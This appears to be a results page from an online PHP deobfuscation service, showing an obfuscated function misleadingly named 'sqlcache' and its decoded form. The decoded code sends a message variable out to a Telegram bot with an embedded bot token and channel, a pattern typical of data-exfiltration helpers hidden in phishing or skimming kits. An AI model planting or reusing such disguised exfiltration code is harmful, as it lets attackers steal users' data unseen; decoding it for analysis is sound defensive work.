Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function sqlcache($msg) { file_get_contents("\x68\164\x74\160\x73\72\x2f\57\..

Decoded Output download

<?php 
 
function sqlcache($msg) { 
   
file_get_contents("https://api.telegram.org/bot5976351830:AAGlfhopt_fbir22m7Nv31YiwqHzWRN9Ypw/sendMessage?chat_id=@managethings&text={$msg}&parse_mode=html"); 
    
} 
 
 
 ?>

Did this file decode correctly?

Original Code

<?php

function sqlcache($msg) {
  
file_get_contents("\x68\164\x74\160\x73\72\x2f\57\141\x70\151\56\164\145\154\x65\x67\x72\141\x6d\56\x6f\162\147\x2f\x62\157\164\x35\x39\67\66\x33\x35\x31\x38\x33\x30\72\x41\101\107\154\146\150\x6f\160\x74\x5f\x66\x62\x69\162\62\x32\x6d\67\116\166\x33\x31\x59\x69\x77\x71\110\172\x57\x52\x4e\71\131\x70\x77\57\163\145\x6e\x64\x4d\x65\163\x73\x61\147\145\x3f\x63\x68\x61\164\x5f\151\144\x3d\100\x6d\x61\156\x61\x67\x65\164\150\151\156\x67\163\x26\x74\x65\x78\164\x3d{$msg}\46\160\x61\x72\x73\145\137\x6d\157\144\145\x3d\150\x74\155\x6c");
   
}


Function Calls

None

Variables

None

Stats

MD5 482117cc80a73ec9c848254ef8fbd374
Eval Count 0
Decode Time 55 ms